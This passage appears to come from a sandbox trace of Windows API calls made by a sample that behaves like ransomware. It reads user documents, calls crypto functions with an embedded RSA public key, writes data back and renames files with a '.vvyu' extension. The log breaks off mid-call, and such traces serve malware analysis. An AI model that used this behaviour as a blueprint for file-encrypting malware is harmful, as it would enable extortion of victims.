lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1650 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1698 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.228] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e10 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2df8 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.231] GetCurrentThreadId () returned 0x66c [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5020 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.231] GetCurrentThreadId () returned 0x66c [0196.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e10 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e70 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e88 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e28 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2df8 [0196.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0196.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1698 | out: hHeap=0x620000) returned 1 [0196.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.242] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x1406f, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x1406f, lpOverlapped=0x0) returned 1 [0196.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.244] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x14074, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.244] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.246] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.246] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.246] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.246] CloseHandle (hObject=0x568) returned 1 [0196.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.248] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\gGXI3yELl78C2wDp.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ggxi3yell78c2wdp.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\gGXI3yELl78C2wDp.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ggxi3yell78c2wdp.pps.vvyu")) returned 1 [0196.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.250] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.253] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11a3a5d0, ftCreationTime.dwHighDateTime=0x1d8a4ab, ftLastAccessTime.dwLowDateTime=0x1010eed0, ftLastAccessTime.dwHighDateTime=0x1d8a5d2, ftLastWriteTime.dwLowDateTime=0x1010eed0, ftLastWriteTime.dwHighDateTime=0x1d8a5d2, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="igCF Ho.ppt", cAlternateFileName="IGCFHO~1.PPT")) returned 1 [0196.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.254] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\igCF Ho.ppt") returned=".ppt" [0196.254] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\igCF Ho.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\igcf ho.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.255] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=2575) returned 1 [0196.255] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.258] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.258] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.260] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.260] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xa0f, lpOverlapped=0x0) returned 1 [0196.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.261] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.262] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.262] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.262] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: 